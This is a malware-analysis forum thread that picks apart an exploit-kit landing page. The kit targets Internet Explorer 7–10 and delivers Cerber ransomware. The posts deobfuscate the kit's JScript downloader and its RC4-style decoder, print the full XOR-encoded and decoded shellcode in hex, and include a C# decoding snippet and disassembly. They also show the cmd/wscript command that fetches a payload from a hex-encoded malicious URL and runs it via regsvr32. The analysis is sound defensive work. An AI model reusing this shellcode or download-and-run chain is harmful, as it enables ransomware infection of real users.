I explained in the spolier : Just a general explanation of the javascript joined

Catching Exploit Kit Landers - OpenDNS Umbrella Blog

Edited:
Added explanations to the main part.
 
Last edited:

DardiM

Level 26
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
Thanks for sharing, very interesting reading ;)
About the script_part :

Some parts can be found on the screenshots from above post (once we use the good shellcode+params)

Will just show some obfuscation used inside.
Method I like :

Builds :

"WinHTTPMRequest.5.1MGETMScripting.FileSystemObjectMWScript.ShellMADODB.StreamMeroM.exeMGetTempNameMcharCodeAtMiso-8859-1MMindexOfM.dllMScriptFullNameMjoinMrunM /c M /s"

0 => "WinHTTP"
1 => "Request.5.1"
2 => "GET"
3 => "Scripting.FileSystemObject"
4 => "WScript.Shell"
5 => "ADODB.Stream"
6 => "ero"
7 => ".exe"
8 => "GetTempName"
9 => "charCodeAt"
10 => "iso-8859-1"
11 => nothing
12 => "indexOf"
13 => ".dll"
14 => "ScriptFullName"
15 => "join"
16 => "run"
17 => " /c"
18 => " /s"
and uses it "like" an array of string

M is the char that separate each part

To retrieve the good part :

u = function(x) {
return E.split("M")[x]
}

=> splits the string in memory (the original string is not modified) using M as separator and return the part at index x
Used like this :

- c = "re" + "gsvr" + 040 + /*QW*/ P

=> regsvr32 + P (040 is the octal representation of 32) and /*QW*/ is like a comment

P = p + Q + c;

=> p = u(7) + u(18) + q[u(8)]()

u(7) =>".exe"

u(18) => " s"

u(8) => "GetTempName"

=> q = W(u(3)),

=> W() :

function(v) {
return new J(v)
};
J = ActiveXObject
=> u(3) => "Scripting.FileSystemObject"

THEN : W(u(3)) => new ActiveXObject("Scripting.FileSystemObject")
=> q[u(8)]() => FSO.GetTempName()
=> get a random temp name
All that to :

- c = "regsvr32.exe s temp_name
- j["run"]("\x63md" + p + u(17) + c, 0)

Remark : at this moment, the payload has been downloaded, and if valid, added ".dll" to c
- j = W(u(4))

=> u(4) => "WScript.Shell"

=> W(u(4)) => new ActiveXObject(""WScript.Shell")

j => shell object that will be use to run the command line
- "\x63md" => "cmd"
- p => u(7) => ".exe"
- u(17) => " /c"

=> shell.run("cmd.exe /c regsvr32.exe s temp_name.dll")

Function to make the http request and retrieve the payload (ransomware)
function H(g) {
var T = u(0),
d = W(T + "." + T + u(1));
d["setProxy"](n);
d.open(u(2), g(1), n);
d.Option(0) = g(2);
d["Sen\x64"];
if (0310 == d.status) return O(d.responseText /**/ , g(n))
};
g is the array of arguments

g(0) => "gexywoaxor"
g(1) =>"http://BAD URL"
g(2) => "USER AGENT"
T = u(0) => "WinHTTP"
u(1) => "Request.5.1"

=> d = new ActiveXObject("WinHTTP" + " ." + "WinHTTP" + "Request.5.1")
=> d = new ActiveXObject("WinHTTP .WinHTTPRequest.5.1")
=> d : object to make the http request

d["setProxy"](n) => d.SetProxy(0)

d.open(u(2), g(1), n)

=> u(2) => "GET"
=> g(1) => the URL to download the payload

=> http.open("GET" , url , 0)​
d.Option(0) = g(2);

=> g(2) => user_agent (the one of the browser used)
d["Send"] => send the request
if (0310 == d.status) return O(d.responseText , g(n))

0310 => octal number => 400 => HTTP OK !
g(n) => g(0) =>
if connection ok :

call O(http.responseText, "gexywoaxor")

O() is the decoder function, that use the password "gexywoaxor" to decode the text received by the request

Code:
function O(n, g) {
    for (var c = 0, s = String, d, D = "pu" + "sh", b = [], i = [], r = 255, a = 0; r + 1 ^ > a; a++)
        b[a] = a;
    for (a = 0; r + 1 ^ > a; a++)
        c = c + b[a] + g[v](a % g.length) ^ & r,
        d = b[a],
        b[a] = b[c],
        b[c] = d;
    for (var e = c = a = 0, S = "fromCharCode"; e ^ < n.length; e++)
        a = a + 1 ^ & r,
        c = c + b[a] ^ & r,
        d = b[a],
        b[a] = b[c],
        b[c] = d,
        i[D](s[S](n[v](e) ^ ^ b[b[a] + b[c] ^ & r]));
    return i[u(15)](u(11))
};

Will not show more, the website is BL and seems to be down, but I thought these parts were interesting
:)
 
Last edited:

yyangcs

Level 1
Thread author
Mar 3, 2017
6
Return-oriented programming - Wikipedia

jmp label1
hop: 58 pop eax
31C9 xor ecx,ecx
66B96D05 mov cx,56Dh
useless: 49 dec ecx
80340884 xor byte ptr [eax+ecx],84h
859 test ecx,ecx
75F7 jne useless
FFE0 jmp eax
label1: E8E9FFFFFF call hop
the part from here is different
but this link can give you an idea :

=> A method of using an exploit to download a payload from the web

Go Near this part :

"Any exploit kit customer can provide a download URL which is passed from JavaScript, through Flash, arriving as an argument to payload which is eventually executed. We can see this by inspecting the ROP Chain that the exploit uses once it achieves control over the instruction pointer."

In your sample : it uses the encoded "gexywoaxor" "http://BAD URL" "USER AGENT22000000"
with the shellcode

need user agent that have "MSIE" inside (IE 7 => 10 )​
Thanks. That article is helpful. Have you tried to put the whole hex string into disassembler? When I did that, I got some bad instructions, which made me think something went wrong.
Catching Exploit Kit Landers - OpenDNS Umbrella Blog

"The payload itself is simply a one liner to create a Windows Script Host temporary file that downloads, deobfuscates, and executes Cerber Ransomware via a DLL using regsvr32.exe."

The exploit part works if the user agent (then the browser) is from IE7 to IE10

try {
d2[e3]++
} catch (exc) {
hjgdgdfgd(er3wssss)

Generate an error that is catch (no message, managed) and to use the exploit

=> hjgdgdfgd(er3wssss) is run​

Let see some parts :

In the javascript file, a lot of functions (add parts in the html files,styles, etc).

=> a test is made

The entry point is here => a test is made

var ie_true = navigator.userAgent.toLowerCase(),
browser = /msie[\/\s]\d+/i.test(ie_true);

if (browser) {
...
...
...
}


inside the if part :


function u7 => decoder function : charCode to String

c2 => "CharCodeAt"
a1 => "length"
v3 => "fromCharCode"
dl => "dashstyle"
sR => "array"
im9 => "item"
iz3 => "%00"
af => "createElement"
o3 => "getElementById"
aF => "indexOf"
cSs => createStyleSheet
ki7 => styleSheets
oi => "style"
we => "Type"
p9 => "cssText"
ip => "getElementByTagName"
wg => "Head"
io8 => "appendChild"
o5 => "string"
r8 => "innerText"
i6 => "innerHtml"
ju3 => "styleSheet"
t7 => "text/css"
ie8 => "marginLeft"
ue3 => "_anchorRect"
y7t => "rotation"
u7h => "_vgRuntimeStyle"
jw2 => "0x"
m5 => "substr"
e3 => "body"
n67 => "classname"
There is somewhere in the file the var we have seen above, er3wssss, that is a part of the exploit (using shellcode) :

er3wssss = part1 + part2

part1 : the shellcode (asm) under string
+ sxcvsasd(parameter 1, parameter 2)​

parameter1 : url
parameter2 : "gexywoaxor" => password !?​

The function uses subfunctions to return an encoded string.​

calling sxcvsasd

function sxcvsasd(u, k) {
var fr = String.fromCharCode;
var c = "",
b = "",
d = "",
f = fr(0x20),
g = fr(0),
v = fr(0x22);
var app = k + v + f + v + u + v + f + v + navigator.userAgent + v + g + g + g + g;

=> "gexywoaxor" "http://..............................." "USER AGENT" 22 00 00 00 00

app.length % 2 && (app += g);
for (var e = 0; e < app.length; e++) {
b = sdfgh(app.charCodeAt(e), 2);
d = sdfgh(app.charCodeAt(e + 1), 2);
c += b + d;
e += 1;
}
return c;

subfunction :
function sdfgh(num, width) {
var xcvaa = "0123456789abcdef";
var sdfgh = xcvaa.substr(num & 0xF, 1);
while (num > 0xF) {

num = num >>> 4;
sdfgh = xcvaa.substr(num & 0xF, 1) + sdfgh;
}
var width = (width ? width : 0);
while (sdfgh.length < width) sdfgh = "0" + sdfgh;
return sdfgh;
}
"gexywoaxor" "http://..............................." "USER AGENT" 22 00 00 00 00
is encoded :
c : "67657879776f61786f7222202268747470....................................."

=> and added at the end of "EB125831C966B96D054980...." (shellcode)​
In fact :

Simple encoding : "decimal to hex under string" encoding

g => 103 => 67
e => 101 => 65

The shellcode : here : language machine codes under a string.

"EB125831C9......................................."

EB12 => jmp 12 = 18 bytes under


58 => pop eax
31C9 => xor %ecx,%ecx
etc
Next parts are to answer the question on the thread : about this shellcode

About the problem when disassembling.
Have you looked the links about obfuscation usually used to make the disassembly failed (I post them on my first post) ?

On you sample you have :

jmp label1
hop: 58 pop eax
31C9 xor ecx,ecx
66B96D05 mov cx,56Dh
useless: 49 dec ecx
80340884 xor byte ptr [eax+ecx],84h
85C9 test ecx,ecx
75F7 jne useless
FFE0 jmp eax
label1: E8E9FFFFFF call hop => value of eax is the next adress (to HERE), and a "push eax" is made when a call occurs => easy to retrieve it.
HERE:
.......
.......
.......
.......
.......
the part code from here is different than the real, and understandable / bad, etc

Why ? look at the beginning !

pop eax => retrieve the value of eax => pointer to "HERE" (will become good code after some stuff)

loop :
xor from byte at address [eax+ecx] with 84h
when ecx = 0
=> real part decoded
=> jmp to eax = > label HERE : the decoded code / parts
First conclusion : the part after HERE is XOR encoded

=> you must do "each bytes XOR 84h

==> not the string "D10D61074028D7D5D3B544E00......"
and "D1" XOR 84h, etc... => wrong
but the bytes :

D1h XOR 84h,
0Dh XOR 84h
61h XOR 84h
=> just run the code until it reach jmp eax and the important part will be decoded.​

mov cx,56Dh

=> 1389 bytes => 2778 chars (I verified, it is all the shellcode part from the label HERE to the end
(the last char once decoded is 22 => 22h => " ),

(without the part added in the JavaScript by
+ sxcvsasd("hXXp://rew.kaghaan.com/index.php?xHiMdbKYJBrMDIQ=l3SMfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9wffY1wRq5TAF-M8jgnzmbJFJc4jw0DT72FZmOMaBF9G4xgY36TIHLOL-AFiXwE4Ugfbct4lsxaBWiTiJGQ23OWwGTFxmuWD", "gexywoaxor")

that returns a hex version of :

"gexywoaxor" "
http://BAD_URL" "USER AGENT" 22 00 00 00 00

In my case :

Code:
67657879776f61786f72222022687474703a2f2f7265772e6b61676861616e2e636f6d2f696e6465782e7068703f7848694d64624b594a42724d4449513d6c33534d665072664a787a46474d5355622d6e4a446139424e55584352514c5068345347684b7258434a2d6f6653696831374f4946787a736d5475324b544b76674a5179667530536147796a31424b654f3130686a6f55655746385a356533783152534c3278336669705341397766665931775271355441462d4d386a676e7a6d624a464a63346a773044543732465a6d4f4d61424639473478675933365449484c4f4c2d41466958774534556766626374346c73786142576954694a475132334f5777475446786d7557442220224d6f7a696c6c612f352e30202857696e646f7773204e542031302e303b2057696e36343b2078363429204170706c655765624b69742f3533372e333620284b48544d4c2c206c696b65204765636b6f29204368726f6d652f35362e302e323932342e3837205361666172692f3533372e33362200000000
)​

Code:
D10D61074028D7D5D3B544E00FC4B40FC4880FC4880F840F840FDC9C0D5C87C4B80FD4FC855E0FFEA4855BB54D0F83855C05BCC7F6E1E5F19805FC8FF7F7C584F1970FC6A0855C8B3380CC0FD698855E8798066F8D074380C5BFCE9CF84B09C174D409F928D3B5443D95848484772FE243C15C858543C128C0848484D4D4D4C4D4CCD4D46F8AD47B57DBDDDF4564870744824D476C697B7B7BE7E9E0AAE1FCE1A4ABF5A4ABE7A4E7E0A4ABE0A4A6A1F0E9F4A1A6A4A2A2A4E1E7ECEBA4E2F1EAE7F0EDEBEAA4C8EBE3ACEAA8E3ADFFE2EBF6ACF2E5F6A4E7B9B4A8F7B9D7F0F6EDEAE3A8E0A8C0B9A6F4F1A6AFA6F7ECA6A8E6B9DFD9A8EDB9DFD9A8F6B9ACB4B7B3B2AFB5ADA8E5B9B4BFF6AFB5DABAE5BFE5AFAFADE6DFE5D9B9E5BFE2EBF6ACE5B9B4BFF6AFB5DABAE5BFE5AFAFADE7B9E7AFE6DFE5D9AFE3DFF2D9ACE5A1E3AAE8E1EAE3F0ECADDAA2F6A8E0B9E6DFE5D9A8E6DFE5D9B9E6DFE7D9A8E6DFE7D9B9E0BFE2EBF6ACF2E5F6A4E1B9E7B9E5B9B4A8D7B9A6E2F6EBE9C7A6AFA6ECE5F6C7EBE0E1A6BFE1DAB8EAAAE8E1EAE3F0ECBFE1AFAFADE5B9E5AFB5DAA2F6A8E7B9E7AFE6DFE5D9DAA2F6A8E0B9E6DFE5D9A8E6DFE5D9B9E6DFE7D9A8E6DFE7D9B9E0A8EDDFC0D9ACF7DFD7D9ACEADFF2D9ACE1ADDADAE6DFE6DFE5D9AFE6DFE7D9DAA2F6D9ADADBFF6E1F0F1F6EAA4EDDFF1ACB5B1ADD9ACF1ACB5B5ADADF9BFE2F1EAE7F0EDEBEAA4CCACE3ADFFF2E5F6A4D0B9F1ACB4ADA8E0B9D3ACD0AFA6AAA6AFD0AFF1ACB5ADADBFE0DFA6F7E1F0D4F6EBFCFDA6D9ACEAADBFE0AAEBF4E1EAACF1ACB6ADA8E3ACB5ADA8EAADBFE0AACBF4F0EDEBEAACB4ADB9E3ACB6ADBFE0DFA6D8FCB1B7E1EAD8FCB2B0A6D9BFEDE2ACB4B7B5B4B9B9E0AAF7F0E5F0F1F7ADF6E1F0F1F6EAA4C8EBE3ACE0DFA6F6E1F7F4EBEAF7E1D0E1FCF0A6D9A8E3ACEAADADF9BFC1B9A6D3EDEACCD0D0D4C9D6E1F5F1E1F7F0AAB1AAB5C9C3C1D0C9D7E7F6EDF4F0EDEAE3AAC2EDE8E1D7FDF7F0E1E9CBE6EEE1E7F0C9D3D7E7F6EDF4F0AAD7ECE1E8A6AFA6E8C9C5C0CBC0C6AAD7F0F6E1E5E9C9E1F6EBC9AAE1FCA6A8F1B9E2F1EAE7F0EDEBEAACFCADFFF6E1F0F1F6EAA4C1AAF7F4E8EDF0ACA6C9A6ADDFFCD9F9A8CEB9C5E7F0EDF2E1DCCBE6EEE1E7F0A8D3B9E2F1EAE7F0EDEBEAACF2ADFFF6E1F0F1F6EAA4EAE1F3A4CEACF2ADF9BFF0F6FDFFC1AFB9A6E1C9C3E1F0D0E1A6AFA6E9F4CAE5E9E1C9E7ECE5F6C7EBE0E1C5F0C9EDF7EBA9BCBCB1BDA9B5C9C9EDEAE0E1FCCBA6AFA6E2C9AAE0E8E8C9D7E7F6A6AFA6EDF4F0C2F1E8E8CAE5A6AFA6E9E1C9EEEBA6AFA6EDEAC9F6A6AFA6F1EAC9A4ABE7A4C9A4ABF7A4A6BFF2E5F6A4F5B9D3ACF1ACB7ADADA8EEB9D3ACF1ACB0ADADA8F7B9D3ACF1ACB1ADADA8F4B9F1ACB3ADA8EAB9B4A8C8B9D3D7E7F6EDF4F0DFF1ACB5B0ADD9A8F2B9F1ACBDADA8E9B9D3D7E7F6EDF4F0AAC5F6E3F1E9E1EAF0F7BFF7AAD0FDF4E1B9B6BFE7B9F5DFF1ACBCADD9ACADBFF7AAC7ECE5F6F7E1F0B9F1ACB4B5B6ADBFF7AACBF4E1EAACADBFEDB9CCACE9ADBFE0B9EDDFF2D9ACEDDFF1ACB5B6ADD9ACA6D4D8FCB0B1D8FCB4B4D8FCB4B4A6ADAFB4B6B3ADBFF7AAF3F6EDF0E1F0E1FCF0ACEDADBFEDE2ACB4B7B3DAB8E0ADFFF2E5F6A4FEB9B5BFE7AFB9F1ACB5B7ADF9E1E8F7E1A4E7AFB9F4BFF7AAF7E5F2E1F0EBE2EDE8E1ACE7A8B6ADBFF7AAC7E8EBF7E1ACADBFFEDAA2DAA2ACE7B9A6F6E1E3F7F2F6B7B6A6AFF4AFF1ACB5BCADAFE7ADBFEEDFA6F6F1EAA6D9ACA6D8FCB2B7E9E0A6AFF4AFF1ACB5B3ADAFE7A8B4ADF9E7E5F0E7ECACDDADFFF9A4E0F7B9A6C0E1E8E1A6BFF5DFE0F7AFA6F0E1E2EDE8E1A6D9ACC8ADBFA4BACDCDEEB2F7C2EBF7F4A4A2A2A4F7F0E5F6F0A4F3F7E7F6EDF4F0A4ABABC6A4ABABC1BECED7E7F6EDF4F0A4CDCDEEB2F7C2EBF7F4A4A6
And remember that in the JavaScript file, after the shellcode, a part is added (hex encoded) => not concerned by the XOR part.
In my case :
Code:
67657879776f61786f72222022687474703a2f2f7265772e6b61676861616e2e636f6d2f696e6465782e7068703f7848694d64624b594a42724d4449513d6c33534d665072664a787a46474d5355622d6e4a446139424e55584352514c5068345347684b7258434a2d6f6653696831374f4946787a736d5475324b544b76674a5179667530536147796a31424b654f3130686a6f55655746385a356533783152534c3278336669705341397766665931775271355441462d4d386a676e7a6d624a464a63346a773044543732465a6d4f4d61424639473478675933365449484c4f4c2d41466958774534556766626374346c73786142576954694a475132334f5777475446786d7557442220224d6f7a696c6c612f352e30202857696e646f7773204e542031302e303b2057696e36343b2078363429204170706c655765624b69742f3533372e333620284b48544d4c2c206c696b65204765636b6f29204368726f6d652f35362e302e323932342e3837205361666172692f3533372e33362200000000

I wrote this small code to get the decoded part of the shellcode :
Code:
string encoded = "D10D61074028D7D5D3B544E00FC4B40FC4880FC4880F840F840FDC9C0D5C87C4B80FD4FC855E0FFEA4855BB54D0F83855C05BCC7F6E1E5F19805FC8FF7F7C584F1970FC6A0855C8B3380CC0FD698855E8798066F8D074380C5BFCE9CF84B09C174D409F928D3B5443D95848484772FE243C15C858543C128C0848484D4D4D4C4D4CCD4D46F8AD47B57DBDDDF4564870744824D476C697B7B7BE7E9E0AAE1FCE1A4ABF5A4ABE7A4E7E0A4ABE0A4A6A1F0E9F4A1A6A4A2A2A4E1E7ECEBA4E2F1EAE7F0EDEBEAA4C8EBE3ACEAA8E3ADFFE2EBF6ACF2E5F6A4E7B9B4A8F7B9D7F0F6EDEAE3A8E0A8C0B9A6F4F1A6AFA6F7ECA6A8E6B9DFD9A8EDB9DFD9A8F6B9ACB4B7B3B2AFB5ADA8E5B9B4BFF6AFB5DABAE5BFE5AFAFADE6DFE5D9B9E5BFE2EBF6ACE5B9B4BFF6AFB5DABAE5BFE5AFAFADE7B9E7AFE6DFE5D9AFE3DFF2D9ACE5A1E3AAE8E1EAE3F0ECADDAA2F6A8E0B9E6DFE5D9A8E6DFE5D9B9E6DFE7D9A8E6DFE7D9B9E0BFE2EBF6ACF2E5F6A4E1B9E7B9E5B9B4A8D7B9A6E2F6EBE9C7A6AFA6ECE5F6C7EBE0E1A6BFE1DAB8EAAAE8E1EAE3F0ECBFE1AFAFADE5B9E5AFB5DAA2F6A8E7B9E7AFE6DFE5D9DAA2F6A8E0B9E6DFE5D9A8E6DFE5D9B9E6DFE7D9A8E6DFE7D9B9E0A8EDDFC0D9ACF7DFD7D9ACEADFF2D9ACE1ADDADAE6DFE6DFE5D9AFE6DFE7D9DAA2F6D9ADADBFF6E1F0F1F6EAA4EDDFF1ACB5B1ADD9ACF1ACB5B5ADADF9BFE2F1EAE7F0EDEBEAA4CCACE3ADFFF2E5F6A4D0B9F1ACB4ADA8E0B9D3ACD0AFA6AAA6AFD0AFF1ACB5ADADBFE0DFA6F7E1F0D4F6EBFCFDA6D9ACEAADBFE0AAEBF4E1EAACF1ACB6ADA8E3ACB5ADA8EAADBFE0AACBF4F0EDEBEAACB4ADB9E3ACB6ADBFE0DFA6D8FCB1B7E1EAD8FCB2B0A6D9BFEDE2ACB4B7B5B4B9B9E0AAF7F0E5F0F1F7ADF6E1F0F1F6EAA4C8EBE3ACE0DFA6F6E1F7F4EBEAF7E1D0E1FCF0A6D9A8E3ACEAADADF9BFC1B9A6D3EDEACCD0D0D4C9D6E1F5F1E1F7F0AAB1AAB5C9C3C1D0C9D7E7F6EDF4F0EDEAE3AAC2EDE8E1D7FDF7F0E1E9CBE6EEE1E7F0C9D3D7E7F6EDF4F0AAD7ECE1E8A6AFA6E8C9C5C0CBC0C6AAD7F0F6E1E5E9C9E1F6EBC9AAE1FCA6A8F1B9E2F1EAE7F0EDEBEAACFCADFFF6E1F0F1F6EAA4C1AAF7F4E8EDF0ACA6C9A6ADDFFCD9F9A8CEB9C5E7F0EDF2E1DCCBE6EEE1E7F0A8D3B9E2F1EAE7F0EDEBEAACF2ADFFF6E1F0F1F6EAA4EAE1F3A4CEACF2ADF9BFF0F6FDFFC1AFB9A6E1C9C3E1F0D0E1A6AFA6E9F4CAE5E9E1C9E7ECE5F6C7EBE0E1C5F0C9EDF7EBA9BCBCB1BDA9B5C9C9EDEAE0E1FCCBA6AFA6E2C9AAE0E8E8C9D7E7F6A6AFA6EDF4F0C2F1E8E8CAE5A6AFA6E9E1C9EEEBA6AFA6EDEAC9F6A6AFA6F1EAC9A4ABE7A4C9A4ABF7A4A6BFF2E5F6A4F5B9D3ACF1ACB7ADADA8EEB9D3ACF1ACB0ADADA8F7B9D3ACF1ACB1ADADA8F4B9F1ACB3ADA8EAB9B4A8C8B9D3D7E7F6EDF4F0DFF1ACB5B0ADD9A8F2B9F1ACBDADA8E9B9D3D7E7F6EDF4F0AAC5F6E3F1E9E1EAF0F7BFF7AAD0FDF4E1B9B6BFE7B9F5DFF1ACBCADD9ACADBFF7AAC7ECE5F6F7E1F0B9F1ACB4B5B6ADBFF7AACBF4E1EAACADBFEDB9CCACE9ADBFE0B9EDDFF2D9ACEDDFF1ACB5B6ADD9ACA6D4D8FCB0B1D8FCB4B4D8FCB4B4A6ADAFB4B6B3ADBFF7AAF3F6EDF0E1F0E1FCF0ACEDADBFEDE2ACB4B7B3DAB8E0ADFFF2E5F6A4FEB9B5BFE7AFB9F1ACB5B7ADF9E1E8F7E1A4E7AFB9F4BFF7AAF7E5F2E1F0EBE2EDE8E1ACE7A8B6ADBFF7AAC7E8EBF7E1ACADBFFEDAA2DAA2ACE7B9A6F6E1E3F7F2F6B7B6A6AFF4AFF1ACB5BCADAFE7ADBFEEDFA6F6F1EAA6D9ACA6D8FCB2B7E9E0A6AFF4AFF1ACB5B3ADAFE7A8B4ADF9E7E5F0E7ECACDDADFFF9A4E0F7B9A6C0E1E8E1A6BFF5DFE0F7AFA6F0E1E2EDE8E1A6D9ACC8ADBFA4BACDCDEEB2F7C2EBF7F4A4A2A2A4F7F0E5F6F0A4F3F7E7F6EDF4F0A4ABABC6A4ABABC1BECED7E7F6EDF4F0A4CDCDEEB2F7C2EBF7F4A4A6";
String decoded= "";
int value = 132;  //84h
 for (var i = 0; i < test.Length; i = i + 2)
  {
         string hex1 = encoded.Substring(i, 2);
          int dec = Convert.ToInt32(hex1, 16);
          int result = dec ^ value;
           decoded+= result.ToString("X2");
}

At the end : decoded => the decoded string with the important working shellcode

This is the part after XOR 84h
Code:
5589E583C4AC53515731C0648B40308B400C8B400C8B008B008B581889D803403C8B507801DA8B7A2001DF31C98B0701D8813843726561751C81780B7373410075138B422401D80FB704488B521C01DA031C82EB0983C704413B4A187CCF8D45F0508D7DAC5731C0B911000000F3AB66C745D80101C745AC440000005050504050485050EB0E50FFD35F595BC1E00383C006C9C3E8EDFFFFFF636D642E657865202F71202F63206364202F64202225746D702522202626206563686F2066756E6374696F6E204C6F67286E2C67297B666F722876617220633D302C733D537472696E672C642C443D227075222B227368222C623D5B5D2C693D5B5D2C723D28303337362B31292C613D303B722B315E3E613B612B2B29625B615D3D613B666F7228613D303B722B315E3E613B612B2B29633D632B625B615D2B675B765D286125672E6C656E677468295E26722C643D625B615D2C625B615D3D625B635D2C625B635D3D643B666F722876617220653D633D613D302C533D2266726F6D43222B22686172436F6465223B655E3C6E2E6C656E6774683B652B2B29613D612B315E26722C633D632B625B615D5E26722C643D625B615D2C625B615D3D625B635D2C625B635D3D642C695B445D28735B535D286E5B765D2865295E5E625B625B615D2B625B635D5E26725D29293B72657475726E20695B75283135295D287528313129297D3B66756E6374696F6E20482867297B76617220543D752830292C643D5728542B222E222B542B75283129293B645B2273657450726F7879225D286E293B642E6F70656E28752832292C672831292C6E293B642E4F7074696F6E2830293D672832293B645B225C783533656E5C783634225D3B696628303331303D3D642E7374617475732972657475726E204C6F6728645B22726573706F6E736554657874225D2C67286E29297D3B453D2257696E485454504D526571756573742E352E314D4745544D536372697074696E672E46696C6553797374656D4F626A6563744D575363726970742E5368656C222B226C4D41444F44422E53747265616D4D65726F4D2E6578222C753D66756E6374696F6E2878297B72657475726E20452E73706C697428224D22295B785D7D2C4A3D416374697665584F626A6563742C573D66756E6374696F6E2876297B72657475726E206E6577204A2876297D3B7472797B452B3D22654D4765745465222B226D704E616D654D63686172436F646541744D69736F2D383835392D314D4D696E6465784F222B22664D2E646C6C4D536372222B2269707446756C6C4E61222B226D654D6A6F222B22696E4D72222B22756E4D202F63204D202F7320223B76617220713D572875283329292C6A3D572875283429292C733D572875283529292C703D752837292C6E3D302C4C3D575363726970745B75283134295D2C763D752839292C6D3D575363726970742E417267756D656E74733B732E547970653D323B633D715B752838295D28293B732E436861727365743D7528303132293B732E4F70656E28293B693D48286D293B643D695B765D28695B75283132295D2822505C7834355C7830305C78303022292B303237293B732E7772697465746578742869293B6966283033375E3C64297B766172207A3D313B632B3D75283133297D656C736520632B3D703B732E73617665746F66696C6528632C32293B732E436C6F736528293B7A5E265E2628633D227265677376723332222B702B75283138292B63293B6A5B2272756E225D28225C7836336D64222B702B75283137292B632C30297D63617463682859297B7D2064733D2244656C65223B715B64732B22746566696C65225D284C293B203E49496A3673466F73702026262073746172742077736372697074202F2F42202F2F453A4A5363726970742049496A3673466F73702022

jmp label1
hop: 58 pop eax

1C9 xor ecx,ecx
66B96D05 mov cx,56Dh
useless: 49 dec ecx

80340884 xor byte ptr [eax+ecx],84h
85C9 test ecx,ecx
75F7 jne useless
FFE0 jmp eax
label1: E8E9FFFFFF call hop

=> replaced with 23 NOP (90h)

9090909090909090909090909090909090909090909090

(to respect the data size if it was a file)

The shellcode XORed, once decoded end with 20 22 =>
20 => space
22 => "
The second part added in the javascript to the shellcode end with "22 00 00 00 00"

In hex 22 00 00 00 00 =>
22 => "
00 .... => + 00 : end of string / not important values , etc

Concatenating the two parts :

shellcode "parameters" 00 00 00 00​

You can now take into account the part on the JavaScript that correspond to

"gexywoaxor" "http://BAD_URL" "USER AGENT" 22 00 00 00 00

that have been encoded from text to hex under string​

=> for me : "67657879776f61786f7222202268747470.....................2200000000"​

To end, let's see what it looks like with a disassembler

Oh ! Now you have the real part ! ;)

Beautiful asm part :)

View attachment 141290

Interesting info inside

View attachment 141291View attachment 141302

On the screen-shoots we can see that :
=> It uses cmd and windows host script (wscript, here) to be a naughty script (obfuscated)

- "gexywoaxor"
- "http://BAD_URL"
- "USER AGENT"

=> arguments
Just take into account that there will be some real asm codes, and some code that the disassembler put, reading the bytes and trying to make asm instructions, that are datas.

Example :

the data for the second part (added to the string that contents the shellcode) begins at : 56dh
Code:
...............
56d:    67 65 78 79             addr16 gs js 0x5ea
571:    77 6f                   ja     0x5e2
573:    61                      popa
574:    78 6f                   js     0x5e5
576:    72 22                   jb     0x59a
578:    20 22                   and    BYTE PTR [edx],ah
57a:    68 74 74 70 3a          push   0x3a707474
57f:    2f                      das
580:    2f                      das
581:    72 65                   jb     0x5e8
583:    77 2e                   ja     0x5b3
585:    6b 61 67 68             imul   esp,DWORD PTR [ecx+0x67],0x68
...............

But in reallity it is only data that the disassembler translate to asm :

"gexywoaxor" "http://..............................." "USER AGENT" 22 00 00 00 00​

67657879776f61786f72 => gexywoaxor

The same for the main part :

At 99 (just after a function call)​

=> data (but the disassembler put asm codes) :

63 6d 64 arpl WORD PTR [ebp+0x64],bp
2e 65 78 65 cs gs js 0x105
20 2f and BYTE PTR [edi],ch
71 20
...
...

CharCode of => cmd.exe /q /c cd /d "%tmp" ..................

Code:
...............
84: eb 0e                   jmp    0x94
86: 50                      push   eax
87: ff d3                   call   ebx
89: 5f                      pop    edi
8a: 59                      pop    ecx
8b: 5b                      pop    ebx
8c: c1 e0 03                shl    eax,0x3
8f: 83 c0 06                add    eax,0x6
92: c9                      leave
93: c3                      ret
94: e8 ed ff ff ff          call   0x86
99: 63 6d 64                arpl   WORD PTR [ebp+0x64],bp
9c: 2e 65 78 65             cs gs js 0x105
a0: 20 2f                   and    BYTE PTR [edi],ch
a2: 71 20                   jno    0xc4
a4: 2f                      das
a5: 63 20                   arpl   WORD PTR [eax],sp
a7: 63 64 20 2f             arpl   WORD PTR [eax+eiz*1+0x2f],sp
ab: 64 20 22                and    BYTE PTR fs:[edx],ah
ae: 25 74 6d 70 25          and    eax,0x25706d74
b3: 22 20                   and    ah,BYTE PTR [eax]
...............


Method :

Catching Exploit Kit Landers - OpenDNS Umbrella Blog
Return-oriented programming - Wikipedia

"With data execution prevention, an adversary cannot execute maliciously injected instructions because a typical buffer overflow overwrites contents in the data section of memory, which is marked as non-executable. To defeat this, a return-oriented programming attack does not inject malicious code, but rather uses instructions that are already present, called "gadgets", by manipulating return addresses. A typical data execution prevention cannot defend against this attack because the adversary did not use malicious code but rather combined "good" instructions by changing return addresses; therefore the code used would not be marked non-executable."

Use the exploit of IE7 to IE10 Browser to be able to get / use the shellcode that manipulate return addresses (this sample decode the real part)

to run cmd / wscript

which :
=> downloads the payload as dll, register it (regsvr32)
=> runs it
=> delete the temp file​

cmd.exe /q /c cd /d "%tmp%" &&
echo
script_part > temp_file
&&
start wscript //B //E:JScript temp_file "gexywoaxor" "BAD_URL" "USER_AGENT"



script_part : obfuscated script functions, etc
echo ..... > => put the content in a file​

@yyangcs

I hope it helped you (now you can see the obfuscated script on the disassembler info).

Edited;
Posted some info about the obfuscated script_part


Thanks, this is very helpful. @DardiM
 
  • Like
Reactions: DardiM

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top